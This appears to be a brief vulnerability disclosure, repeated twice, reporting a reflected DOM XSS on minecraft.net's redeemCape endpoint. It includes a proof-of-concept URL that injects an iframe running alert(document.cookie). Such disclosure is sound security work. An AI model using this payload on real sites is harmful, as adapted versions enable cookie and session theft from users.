Reflected XSS on minecraft.net
Hello!
I have found reflected DOM xss on minecraft.net on redeemCape endpoint ![]()
PoC: https://minecraft.net/pl-pl/profile/redeemCape/%3Ciframe%20src=javascript:alert(document.cookie)%3E
Greetings
Hello!
I have found reflected DOM xss on minecraft.net on redeemCape endpoint ![]()
PoC: https://minecraft.net/pl-pl/profile/redeemCape/%3Ciframe%20src=javascript:alert(document.cookie)%3E
Greetings